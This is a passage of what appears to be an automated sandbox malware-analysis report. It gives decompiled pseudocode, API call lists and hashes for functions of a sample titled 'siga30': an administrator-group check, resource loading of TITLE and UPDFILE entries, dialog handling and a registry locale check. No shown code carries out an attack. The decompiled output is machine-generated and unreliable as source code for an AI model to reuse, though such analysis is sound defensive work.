				_v8 = _t23 ^ _t53;
				_t25 =  *0x78128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00076CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E000717EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x78128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x78128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x000718a3
0x000718a3
0x000718ab
0x000718b2
0x000718b5
0x000718be
0x000718c0
0x000718c6
0x000718c7
0x000718ca
0x000718cf
0x000719c9
0x000719d8
0x000719d8
0x000718df
0x000719b8
0x000719bd
0x000719bf
0x000719bf
0x00000000
0x000719bd
0x000718fa
0x00000000
0x00000000
0x00071912
0x000719aa
0x000719ad
0x000719b3
0x00000000
0x00071927
0x00071927
0x00071932
0x00071936
0x000719a9
0x000719a9
0x00000000
0x000719a9
0x0007194c
0x000719a2
0x000719a3
0x00000000
0x0007196e
0x00071970
0x00071999
0x0007199c
0x00000000
0x0007199c
0x00071972
0x00071972
0x00071975
0x00071984
0x00071985
0x0007198a
0x00000000
0x00000000
0x00000000
0x0007198c
0x00071991
0x00071996
0x00000000
0x00071996
0x0007194c

APIs

Part of subcall function 000717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000718DD), ref: 0007181A
Part of subcall function 000717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0007182C
Part of subcall function 000717EE: AllocateAndInitializeSid.ADVAPI32(000718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000718DD), ref: 00071855
Part of subcall function 000717EE: FreeSid.ADVAPI32(?,?,?,?,000718DD), ref: 00071883
Part of subcall function 000717EE: FreeLibrary.KERNEL32(00000000,?,?,?,000718DD), ref: 0007188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000718EB
OpenProcessToken.ADVAPI32(00000000), ref: 000718F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0007190A
GetLastError.KERNEL32 ref: 00071918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0007192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00071944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00071964
EqualSid.ADVAPI32(00000004,?), ref: 0007197A
FreeSid.ADVAPI32(?), ref: 0007199C
LocalFree.KERNEL32(00000000), ref: 000719A3
CloseHandle.KERNEL32(?), ref: 000719AD

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 8d268279ae0b13c1230b89abd706ed414b86696bbfe9c4ff3f9566ed586375cc
Instruction ID: f394330b74e67b0a4c865a11adaf3be8ce45f0bb61ec789b930b12d8f844588d
Opcode Fuzzy Hash: 8d268279ae0b13c1230b89abd706ed414b86696bbfe9c4ff3f9566ed586375cc
Instruction Fuzzy Hash: 2C311271E00209AFEB509FA9DC58AEF7BBCFF45700F108415E649E2190D73D9945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0007468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0007468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00074699
0x0007469b
0x000746a9
0x000746af
0x000746b4
0x000746bc
0x000746f9
0x00000000
0x000746f9
0x000746d9
0x000746dd
0x00000000
0x00000000
0x000746e5
0x000746ef
0x00000000
0x000746f5
0x000746ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
memcpy_s.MSVCRT ref: 000746E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

Strings

TITLE, xrefs: 0007469D, 000746C0
siga30, xrefs: 000746E4

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$siga30
API String ID: 3370778649-532272691
Opcode ID: 7f99a511da66443565fa83fd59966c6053c00afcc6d5ebc7dc32d57e5fb8fe79
Instruction ID: e2bcd45bdc7c60d15fead63170a4f0ba327e8a1f4629ba3c8e1f88705acbed35
Opcode Fuzzy Hash: 7f99a511da66443565fa83fd59966c6053c00afcc6d5ebc7dc32d57e5fb8fe79
Instruction Fuzzy Hash: A901D632B442007BF32027A56C0CF6F3E6CEBC7B62F044414FA4DA6180CA6D888582B7

Uniqueness

Uniqueness Score: -1.00%

Function 000717EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E000717EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x78004; // 0xa87cf02e
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x7a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00076CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x000717f6
0x000717fd
0x00071805
0x0007180b
0x0007180d
0x00071815
0x00071818
0x00071820
0x00071824
0x0007182c
0x00071832
0x00071837
0x00071851
0x00071854
0x0007185d
0x00071862
0x0007186c
0x00071872
0x00071877
0x0007187e
0x0007187e
0x00071883
0x00071883
0x0007185d
0x0007188a
0x0007188a
0x000718a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000718DD), ref: 0007181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0007182C
AllocateAndInitializeSid.ADVAPI32(000718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000718DD), ref: 00071855
FreeSid.ADVAPI32(?,?,?,?,000718DD), ref: 00071883
FreeLibrary.KERNEL32(00000000,?,?,?,000718DD), ref: 0007188A

Strings

advapi32.dll, xrefs: 00071810
CheckTokenMembership, xrefs: 00071826

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: d8058fb64addb9f150d5c5f600f36c3451dae1645ce2df1944bea0d03dcc0b34
Instruction ID: 089c2e24eace0b8b682eab3ce03f801251de954e8db341490d83e8ee7e299816
Opcode Fuzzy Hash: d8058fb64addb9f150d5c5f600f36c3451dae1645ce2df1944bea0d03dcc0b34
Instruction Fuzzy Hash: 5A119A31F00209ABEB509FA4DC49ABEB7B8EF85701F104569F919F6290DA399D4087D5

Uniqueness

Uniqueness Score: -1.00%

Function 00073450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00073450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E000743D0(_t24, _t12);
					SetWindowTextA(_t24, "siga30");
					SetDlgItemTextA(_t24, 0x838,  *0x79404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x791dc = 1;
					goto L8;
				}
				return 0;
			}

0x00073459
0x0007345c
0x000734d8
0x000734de
0x00000000
0x000734e0
0x0007345e
0x00073463
0x0007349a
0x000734a0
0x000734a7
0x000734b2
0x000734c4
0x000734cb
0x00000000
0x000734cb
0x00073468
0x0007346e
0x00073474
0x00000000
0x00000000
0x0007347c
0x0007348c
0x00073490
0x00000000
0x00073496
0x00073484
0x00000000
0x00000000
0x00073486
0x00000000
0x00073486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00073490
GetDesktopWindow.USER32 ref: 0007349A
SetWindowTextA.USER32(?,siga30), ref: 000734B2
SetDlgItemTextA.USER32(?,00000838), ref: 000734C4
SetForegroundWindow.USER32(?), ref: 000734CB
EndDialog.USER32(?,00000002), ref: 000734D8

Strings

siga30, xrefs: 000734AC

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: siga30
API String ID: 852535152-2499866817
Opcode ID: ead68368ef5033c73833274b0b7beb8adef2b7b10e20f53f8c631c56f1422cca
Instruction ID: 21fa9cf691cec3486d929fc2e8fe20cae8ca1052e25ac67d7aa11dee4c2215a5
Opcode Fuzzy Hash: ead68368ef5033c73833274b0b7beb8adef2b7b10e20f53f8c631c56f1422cca
Instruction Fuzzy Hash: 53019231F50114ABF72E5F68DC0C96D3B64EB46701F50C010FA4EA65A0C73DAB91EB89

Uniqueness

Uniqueness Score: -1.00%

Function 00072AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00072AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x78004; // 0xa87cf02e
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x79a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00071680(_t65, E000717C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E000765E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00071680(_t65, E000717C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00076CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00072aac
0x00072ab7
0x00072abc
0x00072abe
0x00072ac3
0x00072ac6
0x00072ac9
0x00072ace
0x00072ae6
0x00072bdc
0x00072bdc
0x00072be0
0x00000000
0x00000000
0x00072af2
0x00072afc
0x00072b00
0x00072b05
0x00072b05
0x00072b0b
0x00072bca
0x00072bd1
0x00072b11
0x00072b18
0x00072b26
0x00072b99
0x00072bc8
0x00000000
0x00000000
0x00072b9b
0x00072bae
0x00072bb3
0x00072bb5
0x00072bb5
0x00072bb8
0x00072bb8
0x00072bba
0x00072bbb
0x00000000
0x00072bb8
0x00072b28
0x00072b2e
0x00072b33
0x00072b39
0x00072b3c
0x00072b3c
0x00072b3e
0x00072b3f
0x00072b55
0x00072b5d
0x00072b64
0x00072b64
0x00072b7a
0x00072b7f
0x00072b81
0x00072b81
0x00072b84
0x00072b84
0x00072b86
0x00072b87
0x00072bbf
0x00072bc1
0x00072bc1
0x00072b26
0x00072bda
0x00072bda
0x00072be6
0x00072be6
0x00072bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00072AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00072AF2
CharNextA.USER32(?), ref: 00072B12
CharUpperA.USER32 ref: 00072B1E
CharPrevA.USER32(?,?), ref: 00072B55
CharNextA.USER32(?), ref: 00072BD4

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: ad07abc5b6c19648561fb3cab26ca04f83c3a268a4ce830a595154a259a9934b
Instruction ID: 799a33e034390264fa397689fe97f71e81a4cdc41557ff974a60dc02750b2a84
Opcode Fuzzy Hash: ad07abc5b6c19648561fb3cab26ca04f83c3a268a4ce830a595154a259a9934b
Instruction Fuzzy Hash: 6B413A34E081855FEB559F348C54AFD7BA99F93300F04809AD8CE93242DB3D4E86CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 000743D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000743D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x78004; // 0xa87cf02e
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00076CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x000743d0
0x000743d8
0x000743df
0x000743e6
0x000743ec
0x000743f1
0x00074400
0x00074403
0x0007440b
0x00074420
0x00074429
0x00074437
0x00074444
0x00074447
0x0007444d
0x00074454
0x0007445b
0x00074460
0x00074461
0x00074467
0x0007446f
0x00074473
0x00074473
0x00074463
0x00074463
0x00074463
0x0007447a
0x00074481
0x00074484
0x0007448a
0x00074492
0x00074496
0x00074496
0x00074486
0x00074486
0x00074486
0x000744b8

APIs

GetWindowRect.USER32(?,?), ref: 000743F1
GetWindowRect.USER32(00000000,?), ref: 0007440B
GetDC.USER32(?), ref: 00074423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0007442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0007443A
ReleaseDC.USER32(?,00000000), ref: 00074447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000744A2

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 12423728f17de440f18868906f0ebe9c6ecc0fc6a409371ab924ed6e1ab0eb27
Instruction ID: 71beed392b63e84cee50b44e6c233ab6f22b569b71a6bb0e26bc5b9ccd9258a6
Opcode Fuzzy Hash: 12423728f17de440f18868906f0ebe9c6ecc0fc6a409371ab924ed6e1ab0eb27
Instruction Fuzzy Hash: 97314D72F00119AFDB14CFB8DD889EEBBB5EB89310F554169F809B3240DB386C458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00076298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00076298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x78004; // 0xa87cf02e
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0007171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x79124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x7a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0007171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00076CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00076298
0x000762a0
0x000762a7
0x000762ad
0x000762af
0x000762bb
0x000762c3
0x000762c4
0x0007633b
0x0007633b
0x00076345
0x0007634d
0x00000000
0x00000000
0x000762da
0x000762de
0x0007635f
0x00076369
0x000762e0
0x000762e0
0x000762e0
0x000762e3
0x000762e5
0x000762e5
0x000762e8
0x000762e8
0x000762ea
0x000762eb
0x000762ef
0x000762f1
0x000762f3
0x00076302
0x00076308
0x0007630d
0x00076314
0x00076314
0x00076316
0x00076319
0x00076355
0x00076357
0x0007631b
0x0007631b
0x00076331
0x00076334
0x00076339
0x00000000
0x00076339
0x00076319
0x0007636b
0x0007637d
0x0007637d
0x00000000

APIs

Part of subcall function 0007171E: _vsnprintf.MSVCRT ref: 00071750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 000762CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 000762D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 0007631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00076345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 00076357

Strings

UPDFILE%lu, xrefs: 000762B3, 00076329

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 699612de123c4531bc826aab9afec31254aa6c70792e3012fd7cfed80b6f35c2
Instruction ID: b6b3ff78a0de367c77fe00f9532598e6690b1d490127f228e79ca405a4c506e4
Opcode Fuzzy Hash: 699612de123c4531bc826aab9afec31254aa6c70792e3012fd7cfed80b6f35c2
Instruction Fuzzy Hash: CF21D271E00619ABEB149F64DC459FE7B78FB85710B008119E90AA3241DB3E9A42CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0007681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0007681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x78004; // 0xa87cf02e
				_v8 = _t19 ^ _t44;
				_t41 =  *0x781d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x781d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x781d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x71140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E000766F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x781d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
